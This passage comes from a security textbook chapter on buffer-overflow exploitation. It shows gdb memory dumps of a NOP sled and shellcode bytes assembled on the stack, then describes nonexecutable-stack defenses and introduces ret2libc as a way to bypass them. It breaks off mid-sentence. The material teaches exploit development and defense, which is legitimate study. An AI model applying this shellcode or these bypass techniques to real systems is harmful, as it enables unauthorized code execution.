Graphics Programs Reference
In-Depth Information
(gdb) stepi 10
0xbffff9c4 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x50505050
0xbffff9ca: 0x50505050 0x00000050 0x00000000 0x00000000
0xbffff9da: 0x90900000 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(gdb) stepi 5
0xbffff9c9 in ?? ()
(gdb) x/24x 0xbffff9ba
0xbffff9ba: 0x50505050 0x50505050 0x50505050 0x90905050
0xbffff9ca: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9da: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9ea: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff9fa: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffa0a: 0x31db31c0 0xa4b099c9 0x0b6a80cd 0x2f685158
(
gdb)
Now the execution pointer (EIP) can flow over the NOP bridge into the
constructed shellcode.
Printable shellcode is a technique that can open some doors. It and
all the other techniques we discussed are just building blocks that can be
used in a myriad of different combinations. Their application requires some
ingenuity on your part. Be clever and beat them at their own game.
0x6a0
Hardening Countermeasures
The exploit techniques demonstrated in this chapter have been around for
ages. It was only a matter of time for programmers to come up with some
clever protection methods. An exploit can be generalized as a three-step
process: First, some sort of memory corruption; then, a change in control
flow; and finally, execution of the shellcode.
0x6b0
Nonexecutable Stack
Most applications never need to execute anything on the stack, so an obvious
defense against buffer overflow exploits is to make the stack nonexecutable.
When this is done, shellcode inserted anywhere on the stack is basically useless.
This type of defense will stop the majority of exploits out there, and it is
becoming more popular. The latest version of OpenBSD has a nonexecutable
stack by default, and a nonexecutable stack is available in Linux through PaX,
a kernel patch.
0x6b1
ret2libc
Of course, there exists a technique used to bypass this protective counter-
measure. This technique is known as
returning into libc
. libc is a standard C
library that contains various basic functions, such as
printf()
and
exit()
. These
